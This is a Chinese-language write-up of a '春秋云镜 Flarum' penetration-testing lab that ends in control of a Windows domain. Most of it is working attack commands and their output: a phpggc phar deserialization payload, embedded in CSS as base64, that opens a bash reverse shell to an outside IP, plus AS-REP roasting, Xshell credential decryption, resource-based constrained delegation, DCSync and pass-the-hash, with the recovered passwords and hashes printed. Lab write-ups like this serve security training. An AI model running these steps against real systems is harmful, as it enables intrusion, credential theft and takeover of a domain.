春秋云镜 Flarum
信息收集
[09:47:00] 200 - 2KB - /tags[09:47:16] 200 - 1KB - /web.config[09:45:21] 200 - 2KB - /all[09:45:21] 404 - 48B - /api-doc[09:45:21] 404 - 48B - /api/__swagger__/[09:45:21] 404 - 48B - /api/2/explore/[09:45:21] 404 - 48B - /api/api[09:45:21] 404 - 48B - /api.php[09:45:21] 404 - 48B - /api-docs[09:45:21] 404 - 48B - /api.log[09:45:21] 404 - 48B - /api.py[09:45:21] 404 - 48B - /api.json[09:45:21] 404 - 48B - /api/_swagger_/[09:45:21] 404 - 48B - /api/2/issue/createmeta[09:45:21] 404 - 48B - /api/api-docs[09:45:21] 200 - 2KB - /api/[09:45:21] 404 - 48B - /api/apidocs/swagger.json[09:45:21] 404 - 48B - /api/apidocs[09:45:21] 200 - 2KB - /api[09:45:24] 301 - 313B - /assets -> http://39.99.246.81/assets/[09:45:24] 403 - 277B - /assets/[09:45:55] 401 - 2KB - /flags[09:46:13] 405 - 2KB - /login[09:46:14] 302 - 0B - /logout -> http://39.99.246.81[09:46:40] 405 - 2KB - /register[09:46:41] 405 - 2KB - /reset[09:46:45] 403 - 277B - /server-status[09:46:45] 403 - 277B - /server-status/[09:46:47] 401 - 2KB - /settings
使用rockyou爆破出来密码,然后进入后台搜索相关漏洞,存在phar反序列化
跳板机权限
php -d phar.readonly=0 phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/123.249.0.46/8080 0>&1'"
自定义css样式@import (inline) 'data:text/css;base64,dGVzdC50eHQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDA2NjQAAAAAAAAAAAAAAAAAAAAAADAwMDAwMDAwMDA0ADAwMDAwMDAwMDAwADAwMDYyMjEgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhcgAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0ZXN0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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yOyvc3SUEqlIjzSLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=';.test {content: data-uri("phar://./assets/forum.css");}
然后上传msf后门,利用 提权模块探测
run post/multi/manage/autorouterun autoroute -pmulti/recon/local_exploit_suggester
利用openssl的能力错误配置读flag
LFILE=file_to_readopenssl enc -in "$LFILE"
内网信息收集
[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.52:80[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.52:22[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.15:445[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.42:445[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:445[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:389[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.15:139[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.42:139[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:139[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.15:135[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.42:135[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:135[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:88[2025-07-15 11:27:22] [SUCCESS] 服务识别 172.22.60.52:22 => [ssh] 版本:8.9p1 Ubuntu 3ubuntu0.3 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.3.][2025-07-15 11:27:23] [SUCCESS] 端口开放 172.22.60.52:8080[2025-07-15 11:27:27] [SUCCESS] 服务识别 172.22.60.15:445 => [2025-07-15 11:27:27] [SUCCESS] 服务识别 172.22.60.42:445 => [2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.8:445 => [2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.8:389 => [2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.15:139 => Banner:[.][2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.42:139 => Banner:[.][2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.8:139 => Banner:[.][2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.52:80 => [http][2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.8:88 => [2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.52:8080 => [2025-07-15 11:28:28] [SUCCESS] 服务识别 172.22.60.15:135 => [2025-07-15 11:28:28] [SUCCESS] 服务识别 172.22.60.42:135 => [2025-07-15 11:28:28] [SUCCESS] 服务识别 172.22.60.8:135 => [2025-07-15 11:28:28] [INFO] 存活端口数量: 14[2025-07-15 11:28:28] [INFO] 开始漏洞扫描[2025-07-15 11:28:28] [INFO] 加载的插件: findnet, ldap, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle[2025-07-15 11:28:28] [SUCCESS] NetInfo 扫描结果目标主机: 172.22.60.8主机名: DC发现的网络接口:IPv4地址:└─ 172.22.60.8└─ 169.254.192.192[2025-07-15 11:28:28] [SUCCESS] NetInfo 扫描结果目标主机: 172.22.60.15主机名: PC1发现的网络接口:IPv4地址:└─ 172.22.60.15└─ 169.254.126.238[2025-07-15 11:28:28] [SUCCESS] NetInfo 扫描结果目标主机: 172.22.60.42主机名: Fileserver发现的网络接口:IPv4地址:└─ 172.22.60.42└─ 169.254.186.35[2025-07-15 11:28:28] [SUCCESS] NetBios 172.22.60.42 XIAORANG\FILESERVER [2025-07-15 11:28:28] [SUCCESS] NetBios 172.22.60.15 XIAORANG\PC1 [2025-07-15 11:28:28] [SUCCESS] NetBios 172.22.60.8 DC:XIAORANG\DC
发现config.php,拿到数据库密码,然后导出user表
mysql -u root -p -D your_database -s -N -e "SELECT email FROM flarum_users;"
说是要kerberos攻击,GetNPUsers
查找不需要Kerberos预身份验证的用户
proxychains4 python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py xiaorang.lab/ -dc-ip 172.22.60.8 -usersfile user.txt
发现两组
$krb5asrep$23$wangyun@xiaorang.lab@XIAORANG.LAB:33db140a7c184229afbcbc1bc528e15f$8b19657dbf1168e8d7cf69a340f0c852fadfbb736b579e7b6d90fc342259cab9824263d9e67bdb285988b6484105d05c842eb5975071f5b64d206b921e823ca57411779b43776e233d3ef88b51ce9efad0bd34105c5c4a18a57577d924ec673c0c393f16ab51bbd95640e01f3d32ad5279bf02fbb3b6220d352764a97137b98375f4b3cfe14858a633f971e13f0d67ddf0d22e2d69dbd82967eec2cab111d91a9c5ff0d49b1a8a19e614a3ed689e0227f3318d60ed1a87710f7974b261e9d7455baaa03dc485a54c1537ced3d2f4e54e0c630752df8d2b0a00408e488afe697f0f8d10b51e2a6a0cd058c1fa$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:0b48d5cf8a726156024e197bd88c3309$d49d189b7dac0c95d02ef6dcb808a225fd6ef877c6aea1899968577a04fff2ef3ac70f8252f878e8968c81f67538b0590b749e06dd93d71be4f5653402fb541ca8bde09773d3e3ae523653b0b338eff08131fa06bfc3d345ab5963a9967092a8e60c2fed0e959ff1b42aa7ac5d95a1dbc5f10ef81c3740a49267a496abffa2a9f554a3954ae75e7242206d431b30742bcf7d58007287591d2180e93c47a1b6a96dbb3dd8ed7d790bba7c7a21a690b7e55dd83c3841795d801ddec552935049b8a23a5ebc29dca8485be41136415f3221641122110df16844af95fe1dc2bcaf9002e61e289f375abb1e979348
爆破密码
hashcat -m 18200 -a 0 baopo.txt /usr/share/wordlists/rockyou.txt
$krb5asrep$23$wangyun@xiaorang.lab@XIAORANG.LAB:33db140a7c184229afbcbc1bc528e15f$8b19657dbf1168e8d7cf69a340f0c852fadfbb736b579e7b6d90fc342259cab9824263d9e67bdb285988b6484105d05c842eb5975071f5b64d206b921e823ca57411779b43776e233d3ef88b51ce9efad0bd34105c5c4a18a57577d924ec673c0c393f16ab51bbd95640e01f3d32ad5279bf02fbb3b6220d352764a97137b98375f4b3cfe14858a633f971e13f0d67ddf0d22e2d69dbd82967eec2cab111d91a9c5ff0d49b1a8a19e614a3ed689e0227f3318d60ed1a87710f7974b261e9d7455baaa03dc485a54c1537ced3d2f4e54e0c630752df8d2b0a00408e488afe697f0f8d10b51e2a6a0cd058c1fa:Adm12geC
成功爆破,然后用BloodHound查看域内,发现zhangxin用户属于用户组,对于机器有generic权限,然后机器对于XIAORANG.LAB有DCSync权限,可以dump域内所i有哈希
rdp登录
wangyun@xiaorang/Adm12geC
SharpXDecrypt解密
然后发现xshell7使用SharpXDecrypt解密
Xshell全版本凭证一键导出工具!(支持Xshell 7.0+版本)Author: 0pen1Github: https://github.com/JDArmy[!] WARNING: For learning purposes only,please delete it within 24 hours after downloading![*] Start GetUserPath....UserPath: C:\Users\wangyun\Documents\NetSarang Computer\7[*] Get UserPath Success ![*] Start GetUserSID....Username: wangyunuserSID: S-1-5-21-3535393121-624993632-895678587-1107[*] GetUserSID Success !XSHPath: C:\Users\wangyun\Documents\NetSarang Computer\7\Xshell\Sessions\SSH.xshHost: 172.22.60.45UserName: zhangxinPassword: admin4qwY38ccVersion: 7.1
然后使用zhangxin用户登录,使用Acount Operators拿到域控权限
Acount Operators横向
先查询Acount Operators账户
adfind.exe -h 172.22.60.42:389 -s subtree -b CN="Account Operators",CN=Builtin,DC=xiaorang,DC=com member
然后新建机器用户
powershellSet-ExecutionPolicy Bypass -Scope Processimport-module .\Powermad.ps1New-MachineAccount -MachineAccount test3 -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force)
然后设置委派先查sidGet-NetComputer test1 -Properties objectsidtest3 sid:S-1-5-21-1400638014-602433399-2258725660-1152
修改FileServer
的修改msds-allowedtoactonbehalfofotheridentity
的值
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3535393121-624993632-895678587-1116)"$SDBytes = New-Object byte[] ($SD.BinaryLength)$SD.GetBinaryForm($SDBytes, 0)Get-DomainComputer FILESERVER| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
接下来就到了申请ST的步骤了,不过在申请之前,我们需要先配置下映射关系
vim /etc/hosts
而后申请ST
proxychains python3 getST.py -dc-ip 172.22.60.8 "xiaorang.lab/test3$:123456" -spn cifs/FILESERVER.xiaorang.lab -impersonate administrator
导入,而后无密码登录即可
export KRB5CCNAME=administrator@cifs_FILESERVER.xiaorang.lab@XIAORANG.LAB.ccacheproxychains python3 smbexec.py -no-pass -k FILESERVER.xiaorang.lab
整体过程也可以借助Impacket
套件实现
proxychains python3 addcomputer.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -dc-host xiaorang.lab -computer-name 'TEST2$' -computer-pass 'P@ssw0rd'proxychains python3 rbcd.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -action write -delegate-to 'Fileserver$' -delegate-from 'TEST2$'proxychains python3 getST.py xiaorang.lab/'TEST2$':'P@ssw0rd' -spn cifs/Fileserver.xiaorang.lab -impersonate Administrator -dc-ip 172.22.60.8
获取主机权限后,抓一下FILESERVER
的哈希
proxychains secretsdump.py -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8
具体如下
proxychains secretsdump.py -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8[proxychains] config file found: /etc/proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16Impacket for Exegol - v0.10.1.dev1 - Copyright 2022 Fortra - forked by ThePorgs[proxychains] Strict chain ... 119.3.215.198:7001 ... 172.22.60.42:445 ... OK[*] Service RemoteRegistry is in stopped state[*] Starting service RemoteRegistry[*] Target system bootKey: 0xef418f88c0327e5815e32083619efdf5[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd8e2e150f44ea79fff5034cad4539fc:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b40dda6fd91a2212d118d83e94b61b11:::[*] Dumping cached domain logon information (domain/username:hash)XIAORANG.LAB/Administrator:$DCC2$10240#Administrator#f9224930044d24598d509aeb1a015766: (2023-08-02 07:52:21)[*] Dumping LSA Secrets[*] $MACHINE.ACC XIAORANG\Fileserver$:plain_password_hex:3000310078005b003b0049004e003500450067003e00300039003f0074006c00630024003500450023002800220076003c004b0057005e0063006b005100580024007300620053002e0038002c0060003e00420021007200230030003700470051007200640054004e0078006000510070003300310074006d006b004c002e002f0059003b003f0059002a005d002900640040005b0071007a0070005d004000730066006f003b0042002300210022007400670045006d0023002a002800330073002c00320063004400720032002f003d0078006a002700550066006e002f003a002a0077006f0078002e0066003300XIAORANG\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::[*] DPAPI_SYSTEM dpapi_machinekey:0x15367c548c55ac098c599b20b71d1c86a2c1f610dpapi_userkey:0x28a7796c724094930fc4a3c5a099d0b89dccd6d1[*] NL$KM 0000 8B 14 51 59 D7 67 45 80 9F 4A 54 4C 0D E1 D3 29 ..QY.gE..JTL...)0010 3E B6 CC 22 FF B7 C5 74 7F E4 B0 AD E7 FA 90 0D >.."...t........0020 1B 77 20 D5 A6 67 31 E9 9E 38 DD 95 B0 60 32 C4 .w ..g1..8...`2.0030 BE 8E 72 4D 0D 90 01 7F 01 30 AC D7 F8 4C 2B 4A ..rM.....0...L+JNL$KM:8b145159d76745809f4a544c0de1d3293eb6cc22ffb7c5747fe4b0ade7fa900d1b7720d5a66731e99e38dd95b06032c4be8e724d0d90017f0130acd7f84c2b4a[*] Cleaning up... [*] Stopping service RemoteRegistry
获取FILESERVER$
用户哈希为951d8a9265dfb652f42e5c8c497d70dc
,接下来凭借机器用户哈希去获取域控哈希
DcSync攻击
借助secretsdump.py
工具导出域控哈希
proxychains secretsdump.py xiaorang.lab/'Fileserver$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator
获取域控哈希c3cfdc08527ec4ab6aa3e630e79d349b
横向移动
借助wmiexec.py
工具横向
proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b Administrator@172.22.60.15 -codec gbk
拿下域控